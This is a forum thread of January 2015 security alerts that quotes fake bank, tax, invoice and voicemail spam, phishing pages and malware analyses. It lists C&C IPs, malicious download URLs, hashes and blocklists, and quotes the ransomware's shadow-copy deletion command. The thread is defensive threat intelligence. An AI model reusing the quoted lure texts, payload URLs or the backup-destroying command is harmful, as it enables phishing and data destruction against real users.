The malware arrives through -emails- that pretend to be penal notices from the New South Wales government (referred in this entry as “NSW”) -or- shipping information from the Australia Post. Once users click-the-link, they will be -redirected- to a -spoofed- page bearing a newly-registered domain similar to the official, legitimate one. The page instructs users to download a file by first entering a CAPTCHA code. If correctly entered, it triggers the download of the malicious file in a zipped format from SendSpace, a file-hosting site. If the user -opens- the zipped file and executes the malware, it will connect to secure command-and-control (C&C) servers. After successful sending and receiving of information, the malware will then encrypt files in the users’ machines using Elliptic Curve Cryptography Encryption and appends the string .encrypted. Afterwards, it drops an .HTML file with decryption instructions and displays a ransom page. It also deletes the shadow copy of the infected system by executing the command line instruction vssadmin.exe Delete Shadows /All /Quiet, thus preventing the user to restore their files from back-up. Based on feedback from the Smart Protection Network, 98.28% of the recipients are from Australia... ... we have identified several fake domains, 180 for Australia Post and 134 for NSW. These domains are hosted in the following Russian name servers, registered to certain email addresses:
91.218.228.XX
193.124.200.13X
193.124.205.18X
193.124.89.10X
The C&C servers in these attacks are newly registered and hosted under IP addresses ranging from 46.161.30.17 to 46.161.30.49. We have also identified eight domains, including adwordshelper[.]ru and countryregion[.]ru... Sample hashes of the files supported by our detections:
4d07581b5bdb3f93ff2721f2125f30e7d2769270
6a46ff02b1a075c967939851e90dfb36329876fa
9d71e27ad25dfe235dfaec99f6241673a6cff30e
a0bbbd2c75e059d54d217c2912b56b1cb447ef31
0ce7690a209796b530b89f3cac89c90626785b84
09d5bc847f60ce3892159f717548d30e46cd53f0
1816a65aa497877b8f656b87550110e04ac972cd
bee66ab8460ad41ba0589c4f46672c0f8c8419f8 ..."
(More detail at the trendmicro URL at the top of this post.)

:fear: :mad:

AplusWebMaster
2015-01-13, 16:24
FYI...

Fake 'Nat West Secure Message' SPAM – PDF malware
- http://myonlinesecurity.co.uk/nat-west-new-secure-message-fake-pdf-malware/
13 Jan 2013 - "'You have a new Secure Message' pretending to come from NatWest <secure.message@ natwest .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You have received a encrypted message from NatWest Customer Support
In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the NatWest Bank Secure Email Help Desk at 0131 556 2313.

13 January 2015: SecureMessage.pdf.zip: Extracts to: SecureMessage.pdf.scr
Current Virus total detections: 1/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1b8ea8bbd91995f7a9e1c5f6aaf8fa098940c40f025d20d4b00e34bb8839e288/analysis/1421155786/
___

Fake 'Tax return' SPAM
- http://blog.dynamoo.com/2015/01/malware-spam-johnsmithmail-irsgov-your.html
13 Jan 2015 - "This -fake- tax return spam leads to malware:
From: John Smith [mailto:john.smith@ mail-irs .gov]
Sent: 13 January 2015 11:13
Subject: Your tax return was incorrectly filled out
Attention: Owner/ Manager
We would like to inform you that you have made mistakes while completing the last tax form application (ID: 960164707883) .
Please follow the advice of our tax specialists HERE
Please amend the mistakes and send the corrected tax return to your tax agent as soon as possible.
Yours sincerely

The link in the email has a format such as:
http ://marypageevans .com/taxadmin/get_doc.html
http ://laser-support .co.uk/taxadmin/get_doc.html
A journey through some heavily obfuscated javascript follows... which eventually leads to a download called message.zip which contains a malicious executable tax_guide_pdf.exe which changes slightly every time it is downloaded. Incidentally, there seems to be a download limit of about 6 times, after which nonsense text is displayed instead. The .exe file has a VirusTotal detection rate of just 2/57* and Norman identifies it as Upatre. According to the Malwr report it connects to the following URLs:
http ://202.153.35.133 :19639/1301us23/HOME/0/51-SP3/0/
http ://202.153.35.133 :19639/1301us23/HOME/1/0/0/
http ://dstkom .com/mandoc/lit23.pdf
http ://202.153.35.133 :19657/1301us23/HOME/41/7/4/
It also drops a file (in this case called FbIpg60.exe) which has another low detection rate of just 2/57**. Fake IRS spam is quite common, if you don't deal with the IRS then blocking mail-irs .gov on your email gateway might help."
* https://www.virustotal.com/en/file/bd3147d1a6a06a59dc2362229a642a4de11fb0d49525b4333208530716bfe139/analysis/1421160583/

** https://www.virustotal.com/en/file/9cb95959bec83625a6cd9e2dd7d2261bc5715efb28124e600d9db357ea3912dc/analysis/1421161232/

202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
___

Win7 - End of mainstream support
- http://windowssecrets.com/top-story/win7-reaches-milestone-prepare-for-its-demise/
Jan 8, 2015 - "... Most major Microsoft products have a formal life cycle that includes two key end-of-life dates. For Windows, those dates are listed on Microsoft’s “Windows lifecycle fact sheet” webpage.* The first date — End of mainstream support — effectively means that Microsoft will no longer offer free updates to the operating system. Once mainstream support ends for a specific version of Windows, it then enters its Extended support phase, during which Microsoft offers only essential fixes and security updates. (Companies can also pay for specific nonsecurity updates.) When an OS reaches its End of extended support milestone, all official support ends. Windows XP, as many Windows Secrets readers know, passed its “End of extended support” date on April 8, 2014. It has not had official updates of any kind since. (For more specifics on MS product life cycles, see the online “Microsoft support lifecycle policy FAQ.”) As noted in the “Windows lifecycle fact sheet,” Jan. 13 marks the end of mainstream support for all versions of Windows 7 SP1. What does that mean for the millions of us doing our daily computing on Win7 systems? Very soon, our operating systems will be essentially frozen — we’ll no longer receive any enhancements or nonessential fixes. We will, however, receive monthly security updates until Jan. 14, 2020, Win7’s official “End of extended support” date (at which point, Microsoft will want us on Windows 13 — or whatever it’s then called). Just as with XP this past April, Win7 systems should no longer receive updates of any kind after January 2020..."
* http://windows.microsoft.com/en-us/windows/lifecycle

- http://www.theinquirer.net/inquirer/news/2390045/microsoft-ends-mainstream-support-for-windows-7
Jan 13 2015

:fear: :mad:

AplusWebMaster
2015-01-14, 13:59
FYI...

Fake 'Invoice' SPAM – doc malware
- http://myonlinesecurity.co.uk/les-mills-invoice-word-doc-malware/
14 Jan 2015 - "'Les Mills Invoice' pretending to come from lmuk.accounts@ lesmills .com with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... As usual 2 slightly different -malware- versions. The email looks like:
Dear Customer,
Please find attached an invoice for Les Mills goods/services. Please note that for Licence Fee invoices the month being billed is the month in which the invoice has been raised unless otherwise stated within.
If you have any queries please email lmuk.accounts@ lesmills .com or call 0207 264 0200 and select option 3 to speak to a member of the team.
Best regards,
Les Mills Finance Team

14 January 2015 : Les Mills SIV035931.doc - Current Virus total detections: 0/57* : 0/55**
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/3dbc665b89a7a99de58614e905d4fa6105194e6d46d6d36f6756867bcd596564/analysis/

** https://www.virustotal.com/en/file/328929f0fbfa8c28e234741138e2e48a8ab5992d36e5eaaf62017abc57f47b11/analysis/1421225265/

- http://blog.dynamoo.com/2015/01/malware-spam-les-mills-invoice.html
14 Jan 2015
"... Recommended blocklist:
59.148.196.153
74.208.11.204
81.27.38.97
okurimono.ina-ka .com "
___

Fake 'SEPA' SPAM – doc malware
- http://myonlinesecurity.co.uk/senior-accounts-payable-sepa-remittance-advice-word-doc-malware/
14 Jan 2015 - "'Senior Accounts Payable SEPA REMITTANCE ADVICE 2503.62 EUR 12 JAN 2014' with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Good Afternoon
Please see attached a copy of remittance advice for SEPA payment of 2503.62 EUR made on 12/01/2015
Regards,
Victoria Mack
Senior Accounts Payable

14 January 2015 : SE827QR.doc - Current Virus total detections: 0/57*
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/647d4115b9a7a77076ec268a480cf898d18433929664200e1b336ecfdc357fcd/analysis/1421236177/
___

Fake Fax SPAM - PDF malware
- http://myonlinesecurity.co.uk/nextiva-vfax-fake-pdf-malware/
14 Jan 2015 - "'Fax Received: Fax Server | 1/14/2015 8:21 AM' pretending to come from Nextiva vFax <notifications@ nextivafax .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
HI ...
Delivery Information:
Message #: 131177970
Local Number: 4853872678
Remote CSID: Fax Server
Total Pages: 2
Transmit Time: 3 min 41.000 sec
Click here to view this message ...
Delivered by vFax… “When Every Fax is Mission Critical”

14 January 2015: fax_message_01142015_784398443.pdf.zip ( 83kb): Extracts to: fax_message_01142015_784398443.pdf.scr - Current Virus total detections: 3/55*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/dbc7a917aa4137ef6ef6b3d169b92e6100f44079ca07f79067469f871beffdd5/analysis/1421251998/
___

Malware sites offering Oracle 'patches'
- https://blogs.oracle.com/proactivesupportDI/entry/malware_sites_offering_oracle_patches
Jan 14, 2015 - "It has come to our attention that there are non-Oracle sites offering Oracle 'fixes' for genuine Oracle error messages... If you do encounter one of these sites please inform us immediately via Communities* or create a SR and we will rectify the situation... Proactive Support are already investigating some known sites..."
* https://community.oracle.com/
___

Outlook Phish
- https://blog.malwarebytes.org/fraud-scam/2015/01/avoid-this-outlook-phish/
Jan 14, 2015 - "... phish mail in circulation... for Outlook accounts. The email reads as follows:
Dear Microsoft User,
Please note we have temporary blocked your account from receiving e-mails, because we detected fraudulent and spam activities from your mail box to some blacklisted email address, So for your own safety verify your account.
If a verification respond is not gotten from you in the next 24 hours, we are sorry we will be forced to permanently disable and delete your account from Microsoft Account.
To verify your Microsoft account, Click Here
We regret Any inconvenience.
Thanks,
The Microsoft account team

Clicking the link in the email – sbmarticles(dot)com/Z-zone/SigrypAmt2nd(dot)htm*, which has already popped up on Phishtank – takes potential victims to a spot of data URI phishing**.
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/uriphish1-300x186.jpg
Don’t be tricked into filling in login details via these types of attack – any email asking you to login or enter personal information (especially when warning you about account suspensions, unusual activity or any other form of shenanigans) should be treated with a generous helping of caution."
* 192.190.80.53: https://www.virustotal.com/en/ip-address/192.190.80.53/information/

** http://www.csoonline.com/article/2154202/social-engineering/phishing-attack-using-data-uris-to-target-google-accounts.html

:fear::fear: :mad:

AplusWebMaster
2015-01-15, 15:32
FYI...

Fake 'invoice' SPAM - malware attached
- http://blog.dynamoo.com/2015/01/malware-spam-hexis-uk-limited-invoice.html
15 Jan 2015 - "This -fake- invoice has a malicious attachment. It does not comes from Hexis UK Ltd, it is a forgery. Hexis is not sending the spam, nor have their systems been compromised in any way.
From: Invoice from Hexis [Invoice@ hexis .co.uk]
Date: 15 January 2015 at 06:36
Subject: Invoice
Sent 15 JAN 15 08:30
HEXIS (UK) LIMITED
7 Europa Way
Britannia Park
Lichfield
Staffordshire
WS14 9TZ
Telephone 01543 411221
Fax 01543 411246

Attached is a malicious Word document S-INV-CREATIFX-465219.doc which actually comes in -two- different versions (perhaps more) with low detection rates [1] [2] containing two slightly different macros... which download a component from one of the following locations:
http ://dramakazuki.kesagiri .net/js/bin.exe
http ://cassiope .cz/js/bin.exe
This has a VirusTotal detection rate of 3/57*. That report shows the malware phoning home to 74.208.11.204:8080 (1&1 Internet, US) which is a familiar C&C server which you should definitely block traffic to. My sources also identify a couple of other IPs, giving a recommended blocklist of:
59.148.196.153
74.208.11.204
81.27.38.97
UPDATE: the Malwr report shows that it drops a DLL with a VirusTotal detection rate of just 1/57**."
1] https://www.virustotal.com/en/file/6d3694dbebbcdba2899603354f299fba7a7781c6bc092877354cd96e635b4a4b/analysis/1421314924/

2] https://www.virustotal.com/en/file/7db49013954e8864a5ad8bb6189ee7ab3917efff426b4e07670a335c68280bdb/analysis/1421314937/

* https://www.virustotal.com/en/file/87f639a395dc72d9fa2aa517ec2776ee3c9e9c2fa71ba50d832e0ff012373b22/analysis/1421315774/

** https://www.virustotal.com/en/file/105fe9735add6aec937c9e6f611d512511c050895fd863a216d25980c54fad45/analysis/1421318457/


- http://myonlinesecurity.co.uk/hexis-uk-limited-invoice-word-doc-malware/
15 Jan 2015
* https://www.virustotal.com/en/file/6d3694dbebbcdba2899603354f299fba7a7781c6bc092877354cd96e635b4a4b/analysis/1421309107/

** https://www.virustotal.com/en/file/7db49013954e8864a5ad8bb6189ee7ab3917efff426b4e07670a335c68280bdb/analysis/1421309412/
___

Fake 'Payment request' SPAM - malware attachments
- http://blog.dynamoo.com/2015/01/malware-spam-payment-request-of-417694.html
15 Jan 2015 - "This -spam- comes with a malicious Word document attached:
from: Alan Case
date: 15 January 2015 at 08:49
subject: Payment request of 4176.94 (14 JAN 2015)
Dear Sirs,
Sub: Remitance of GBP 4176.94
This is with reference to the above, we request you to kindly remit GBP 4176.94 in favor of our bank account.
For more information on our bank details please refer to the attached document.
Thanking you,
Alan Case Remittance Manager

Other names and job titles seen... The payment amount, name and job title change in each spam, as does the name of the attachment (although this following the format ADV0000XX). There are three malicious Word documents that I have seen, each with a low detection rate at VirusTotal [1] [2] [3] which in turn contain a slightly different macro... which attempt to download another component from one of the following locations:
http ://95.163.121.71 :8080/mopsi/popsi.php
http ://95.163.121.72 :8080/mopsi/popsi.php
http ://136.243.237.204 :8080/mopsi/popsi.php
Note the two adjacent IPs of 95.163.121.71 and 95.163.121.72 which belong to Digital Networks CJSC in Russia (aka DINETHOSTING), an IP range of 95.163.64.0/18 that I would recommend you consider blocking. 136.243.237.204 is a Hetzner IP. The macro downloads a file g08.exe from these locations which is then saved as %TEMP%\UGvdfg.exe. This has a VirusTotal detection rate of 4/57*. That VT report also shows the malware attempting to POST to 194.146.136.1:8080 (PE "Filipets Igor Victorovych", Ukraine) which is a well-known bad IP. The Malwr report is inconclusive, but this exectuable probably drops a Dridex DLL.
Recommended blocklist:
194.146.136.1
95.163.121.71
95.163.121.72
136.243.237.204
UPDATE: the following -are- Dridex C&C servers which you should also block:
80.237.255.196 "
1] https://www.virustotal.com/en/file/58aa6018bb493f02a4981adc395bda36a62235286b804eac6c493b16a7e76881/analysis/1421313787/

2] https://www.virustotal.com/en/file/27d465eb58e46936afa1fea9efd2af211d8b57db447088e69d791b6f302b322d/analysis/1421313798/

3] https://www.virustotal.com/en/file/d1fd0df8db5c3283426d945be8e6cb466c455a1b1a9a534b5f1d33b3c81c5f09/analysis/1421313810/

* https://www.virustotal.com/en/file/f4c36c6e702324f0edb9fd62d2d50bb08c6507ff53847f2816870414dff53eaf/analysis/1421313825/


- http://myonlinesecurity.co.uk/payment-request-14-jan-2015-word-doc-malware/
15 Jan 2015
15 January 2015 : ADV0291LO.doc - Current Virus total detections: 3/55*
15 January 2015 : 57959SI.xls (35 kb) - Current Virus total detections: 3/57**
| 3093720WF.xls (47 kb) - Current Virus total detections: 2/57***
* https://www.virustotal.com/en/file/27d465eb58e46936afa1fea9efd2af211d8b57db447088e69d791b6f302b322d/analysis/1421309631/

** https://www.virustotal.com/en/file/0d8ebd5567fc7c9fdb87dc36673bb5b4e4f193efacfdd6bfddc36dc5b2422325/analysis/1421316140/

*** https://www.virustotal.com/en/file/a537774596d7ac16ca41e6f468c76c807747279de12ccb28b489322aee0b92df/analysis/1421315881/
___

Fake 'open24 .ie important changes alert' SPAM – malware
- http://myonlinesecurity.co.uk/open24-ie-important-changes-servicesemail-alert-malware/
15 Jan 2015 - "'Some important changes to some services' (email alert) pretending to come from Open24 <inf01@ open24 .ie> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Fwd: Software Upgrade
Dear
Open24 Customer,
We have now implemented a number of
changes to our Internet Banking service. This is to ensure the highest
level of security of information passing between you and our server.
To have access to this service, simply follow the button below and activate the service...
Kind regards
Open24
This email is personal & confidential and is intended for the recipient only...

15 January 2015: open24changes.zip (523 kb) : Extracts to: Payment.scr
Current Virus total detections: 17/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/190aaa3ee308ecab4609e7229ee654fb7ab34044d324d65658b2789a9858a768/analysis/1421332957/
___

Fake 'ADP Invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/johnny-west-adp-invoice-week-ending-01112015-fake-pdf-malware/
15 Jan 2015 - "'ADP Invoice for week ending 01/11/2015' pretending to come from Johnny.West@ adp .com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Your most recent ADP invoice is attached for your review.
If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the invoice.
Thank you for choosing ADP for your business solutions.
Important: Please do not respond to this message. It comes from an unattended mailbox.

15 January 2015: invoice_418270412.pdf.zip (11kb): Extracts to: invoice_418270412.pdf.scr
Current Virus total detections: 5/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a33b2a98df1b9b973471de47ad8fc750278a42890ed5924bf3ea23cbd448db7d/analysis/1421335768/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
174.120.16.66: https://www.virustotal.com/en/ip-address/174.120.16.66/information/
69.49.101.51: https://www.virustotal.com/en/ip-address/69.49.101.51/information/
___

Fake 'HSBC Payment Advice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/hsbc-payment-advice-advice-refgb956959-chaps-credits-fake-pdf-malware/
15 Jan 2015 - "'Payment Advice – Advice Ref:[GB956959] / CHAPS credits' pretending to come from HSBC Advising Service [mailto:Bankline.Administrator@ nutwest .com] is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and follow the link or open the attachment... The email looks like:
Sir/Madam,
Please download document from dropbox, payment advice is issued at the request of our customer. The advice is for your reference only.
Download link: <redacted>
Yours faithfully,
Global Payments and Cash Management
HSBC ...

When you follow the... link you get a page looking like this, where depending on which browser you are using, you might get a direct download of the zip file containing the -malware- or you might get the message to follow the link... which will give you the malware:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/avralab.jpg
15 January 2015: doc974_pdf.zip (11kb) : Extracts to: doc963_pdf.exe
Current Virus total detections: 4/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/4c00deb8efcca9de6a86809eeb6613037d4820a56923bf4c262367c4c744f69e/analysis/1421341083/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
66.147.240.173: https://www.virustotal.com/en/ip-address/66.147.240.173/information/

:fear::fear: :mad:

AplusWebMaster
2015-01-16, 13:53
FYI...

Affordable Care Act Phishing Campaign
- https://www.us-cert.gov/ncas/current-activity/2015/01/15/Affordable-Care-Act-Phishing-Campaign
Jan 15, 2015 - "US-CERT is aware of a phishing campaign purporting to come from a U.S. Federal Government Agency. The phishing emails reference the Affordable Care Act in the subject and claim to direct users to health coverage information, but instead direct them to sites which attempt to elicit private information or install malicious code. US-CERT encourages users to take the following measures to protect themselves:
- Do not follow links or download attachments in unsolicited email messages.
- Maintain up-to-date antivirus software.
- Refer to the Avoiding Social Engineering and Phishing Attacks Security Tip* for additional information on social engineering attacks..."
* https://www.us-cert.gov/ncas/tips/ST04-014
___

Fake 'voice mail' SPAM - PDF malware
- http://myonlinesecurity.co.uk/microsoft-outlook-voicemail-received-voice-mail-fake-pdf-malware/
16 Jan 2015 -"'You have received a voice mail' pretending to come from Microsoft Outlook Voicemail <no-reply@your own domain>with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You received a voice mail : VOICE549-693-8777.wav (20 KB)
Caller-Id: 549-693-8777
Message-Id: 8X3NI1
Email-Id: a.j.lefeber14d @ ...
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server

They are not being sent by your own server or email server, but by one of the botnets...
16 January 2015: VOICE44982109219.zip (11kb) : Extracts to: VOICE44982109219.scr
Current Virus total detections: 4/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e1c3617c620614697485b45bb6760e94cea16758c15fa0374629c4a15b54be08/analysis/1421413445/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
192.185.16.192: https://www.virustotal.com/en/ip-address/192.185.16.192/information/
UDP communications
198.27.81.168: https://www.virustotal.com/en/ip-address/198.27.81.168/information/
192.95.17.62: https://www.virustotal.com/en/ip-address/192.95.17.62/information/
___

Adobe Phish back in-the-Wild
- https://blog.malwarebytes.org/fraud-scam/2015/01/adobe-phish-back-in-the-wild/
Jan 15, 2015 - "We recently found a -compromised- site serving what appears to be an Adobe phish. Like most phishing campaigns, this one may have originated from a spammed email. Although we do not have the actual sample of said email, it pays to be familiar with what the fraud page looks like and its content, too. Please direct your attention to the screenshot below:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/00-default.png
We can deduce from the page’s content that the spam may have originated from a spoofed Adobe address, promising an important document the recipient has to see. In order to do so, they are then instructed to access their Adobe account by entering their email credentials, specifically for AOL, Gmail, Outlook, and Yahoo! The page also caters to credentials for other email providers. Visitors clicking either of the email service brands at the right side of the page changes the user entry fields at the left side to match with the look of the real thing... Some of us may quickly and easily identify that the whole thing is a phishing campaign, but some may also not realize this until it’s too late. Be extra careful when dealing with emails purporting to have come from Adobe... It also pays to remain informed and read Adobe’s page here* on how to avoid falling for phishing schemes."
* https://www.adobe.com/security/prevent-phishing.html
___

North Korean News Agency site serves File Infector
- http://blog.trendmicro.com/trendlabs-security-intelligence/north-korean-news-agency-website-serves-file-infector/
Jan 16, 2015 - "We were recently alerted to reports* claiming that the website North Korea’s official news service, www.kcna .kp, had been delivering -malware- via embedded malicious code. One of the photo spreads on the website was found to contain malware that launched a watering hole attack on individuals who came to visit the website and its other pages. Below is an infection diagram for the malware associated with this attack:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/01/Diagram2.jpg
The mother file in this attack is detected as PE_WINDEX.A-O. As seen in the diagram above, the executable file mscaps.exe drops wtime32.dll, which contains the infection code and backdoor routine. Another executable file mscaps.exe injects code to explorer.exe to stay memory resident. As such, every time the affected system reboots, the malware runs on the system and begins its infection routine. Explorer.exe executes the infection code and targets .EXE files in drive types that are removable or shared, with drive letters traversed from A-Z. We observed that it skips fixed drives. Apart from explorer.exe, this file infector looks for the following processes where it injects its malicious code:
iexplore.exe
ieuser.exe
firefox.exe
chrome.exe
msimn.exe
msnmsgr.exe
outlook.exe
winmail.exe
yahoomessenger.exe
ftp.exe
The website contains an -infected- .ZIP file named FlashPlayer.zip. Our initial analysis shows that the outdated Flash Player installer drops the main file infector WdExt.exe, which we detect as PE_WINDEX.A-O. It copies and renames the file Ws2_32.dll, which is the file for the Windows Sockets API used by most Internet and network applications to handle network connections. PE_WINDEX.A-O also creates the file SP{random}.tmp, which contains system information that may be responsible for the malware’s information theft routines. It gathers data such as date and time, computer name, user name, OS information, MAC address, and more. The embedded malicious code runs on Internet Explorer version 11.0, Mozilla Firefox versions 10.0.9 and 36.0, Safari versions 7.0.3 and 4.0, Opera version 9.00 and 12.14, and Google Chrome 41.0.2228.0. The browsers we tested all displayed the code snippet that includes /download/FlashPlayer10.zip. Based on replicating the attack with an infected sample (calc.exe), we noticed that the file size is almost the same size as the mother file infector, PE_WINDEX.A-O. Additional analysis also shows that PE_WINDEX.A-O has developer metadata that lists its copyright as © Microsoft Corporation. All rights reserved with its publisher is listed as Microsoft Corporation. Its description and comments contain the text Windows Defender Extension, among other listed information. This may be a disguise for the malware so that users won’t be suspicious about the file..."
* http://arstechnica.com/security/2015/01/surprise-north-koreas-official-news-site-delivers-malware-too/
___

Google finally quashes month-Old Malvertising Campaign
- http://it.slashdot.org/story/15/01/16/0129244/google-finally-quashes-month-old-malvertising-campaign
Jan 16, 2015 - "Since the middle of December, visitors to sites that run Google AdSense ads have intermittently found themselves -redirected- to other sites featuring spammy offerings for anti-aging and brain-enhancing products*. While webmasters who have managed to figure out which advertisers are responsible could quash the attacks on their AdSense consoles, only now has Google itself managed to track down the villains and -ban- them from the service."
* http://www.itworld.com/article/2871035/google-nixes-widespread-malvertising-attack.html
Jan 14, 2015

:fear::fear: :mad:

AplusWebMaster
2015-01-17, 18:45
FYI...

iTunes invoice – phish
- http://myonlinesecurity.co.uk/itunes-invoice-id31wx175t-phishing/
17 Jan 2015 - "'ITunes Your invoice #ID31WX175T' pretending to come from iTunes Store <do_not_reply@ btconnect .com> is one of the latest -phish- attempts to steal your Bank, credit card and personal details. This one is slightly different to usual ones in that it is designed to make you think that it is a mistake and that you need to enter all your bank/credit card details in order to -cancel- the transaction that you never made in the first place... persuading the recipient that somebody must have compromised their ITunes account and telling you to change all the details in it... not only would you lose a lot of money but could also end up losing a lot more. This one only wants your personal details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well*...
* http://myonlinesecurity.co.uk/how-to-protect-yourself-and-tighten-security/
looks at first glance like the genuine Itunes website but you can clearly see in the address bar, that it is fake. Some versions of this phish will ask you fill in the html (webpage) form that comes attached to the email. If you open the attached html file you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Apple-Store-Purchase-Confirmation.png
When you fill in your user name and password you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format...make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."

:fear: :mad:

AplusWebMaster
2015-01-19, 15:09
FYI...

Fake 'order payment slip' SPAM - malware
- http://myonlinesecurity.co.uk/pierre-jude-bukasonventure-com-re-order-payment-slip-malware/
19 Jan 2015 - "'RE: order payment slip' coming from info@ bukasonventure .com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
This is just to inform you that we have made the payment as Requested.
We try to contact you about the payment we made here in our office, but because the payment was made on Friday evening before the bank closed, and our server was down,
PLEASE REFER TO THE ATTACHMENT SLIP
Best regards,
Mr Pierre Jude Genaral Manager
323 Collier Road, Bayswater WA 6053
Phone: (1) 9379 0811
Fax: (1) 9379 0822 ...

These actually look they they are coming from bukasonventure .com which is hosted in USA and was only registered on 15 January 2015. This might be compromised server, have an open relay allowing the emails to be sent or have been registered under a false set of details with the aim of sending malicious emails and spam. The more I look at this one, the more I am convinced the entire set up has been done with the aim of distributing malware. The domain was registered on 15 January 2015. The computer sending IP 120.140.55.192 is listed as Malaysia...
19 January 2015: order-slip.rar : Extracts to: order-slip.exe
Current Virus total detections: 23/56* ... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/cbf4c8a93ae637d8436ede424b617003105b094cced64c712ec25c68c3a61988/analysis/1421652817/
___

Verizon vuln exposed email accounts - “zombie cookies”
- http://www.securityweek.com/verizon-fixes-vulnerability-exposing-user-email-accounts
Jan 19, 2015 - "... discovered the flaw while analyzing the Android app for Verizon’s fiber optic Internet, telephone and television service FiOS. While investigating the requests sent by the application, the expert noticed a username parameter called uid. By changing the value of this parameter with a different customer’s username, Westergren got the contents of the targeted user’s email account. The researcher* later determined that other API methods for this particular widget were affected as well. For example, by changing the values of the uid and mid parameters in a certain request, he could read individual emails. even managed to send out an email on another user’s behalf by exploiting the vulnerability... The proof-of-concept was sent to Verizon’s security team on January 14. The telecoms giant -confirmed- the existence of the issue by the next day. The vulnerability was fixed on January 16. For responsibly disclosing the security hole, Westergren was rewarded with free FiOS Internet for one year... had been using so-called “zombie cookies” to track subscribers even if they had used private browsing, cleared their cookies, or if they had opted out. The existence of Verizon’s controversial system came to light last year, but the company -denied- using the tracking method in its own business model. After being exposed... announced on Friday that it will suspend its “zombie cookies” program..."
* http://randywestergren.com/critical-vulnerability-verizon-mobile-api-compromising-user-email-accounts/
___

LockHeedMartin Fax Spam
